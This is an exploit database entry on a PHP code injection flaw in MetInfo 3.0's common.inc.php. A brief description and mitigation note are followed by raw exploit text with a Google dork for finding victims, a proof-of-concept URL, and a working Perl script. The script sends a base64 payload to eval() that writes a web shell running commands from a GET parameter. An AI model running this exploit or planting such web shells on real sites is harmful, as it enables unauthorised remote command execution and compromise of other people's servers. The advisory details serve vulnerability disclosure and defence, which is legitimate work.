MetInfo 3.0 PHP Code Injection Vulnerability

vendor:

MetInfo

by:

linux520.com

CVSS

HIGH

Code Injection

CWE

Product Name: MetInfo

Affected Version From: 3.0

Affected Version To: 3.0

Patch Exists: YES

Related CWE: N/A

CPE: a:metinfo:metinfo:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

MetInfo 3.0 PHP Code Injection Vulnerability

MetInfo 3.0 is vulnerable to PHP code injection. This vulnerability exists due to the lack of proper sanitization of user-supplied input in the 'allclass[0]' parameter of the 'common.inc.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to execute unintended commands. Additionally, the application should be updated to the latest version.

Source

Exploit-DB raw data:

#####################################################################################################
#Exploit Title£ºMetInfo 3.0 PHP Code Injection Vulnerability
#Date:2010-10-31
#Author£ºlinux520.com
#Team£ºhttp://www.linux520.com/
#Vendor£ºhttp://www.metinfo.cn/
#Dork£º"Powered by  MetInfo 3.0 "  #    Google: 400,000 + results
#Price£º free
#Language£ºPHP
#Greetz£ºCCAV
#####################################################################################################
+Description£º
at 67 line of  ROOTPATH/include/common.inc.php:

eval(base64_decode($allclass[0])); 

$allclass[0]  is not defined £¬so we can inject eval php code
#####################################################################################################
+POC£ºhttp://victim.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]
#####################################################################################################
+Exploit:

#!/usr/bin/env perl

use LWP::UserAgent;
print "################################################################\n";
print "#              MetInfo 3.0 c0de inj3cti0n 3xplo!t              #\n";
print "#                         by:linux520.com                      #\n";
print "################################################################\n";

die "Usage: $0 <target site> Ex:$0 victim.com\n" unless($ARGV[0]);
my $victim = $ARGV[0];
$user_agent = new LWP::UserAgent;
$vul_request = new HTTP::Request('GET',"http://$victim/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
# fputs(fopen('../templates/test.php','w+'),'<?php passthru($_GET[cmd]);?>');
$user_agent->request($vul_request);
$response = $user_agent->request(new HTTP::Request('GET',"http://$victim/templates/test.php"));
if($response->is_success)
{
	print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id";
}
else
{
print "could not connect to $victim";
}
#####################################################################################################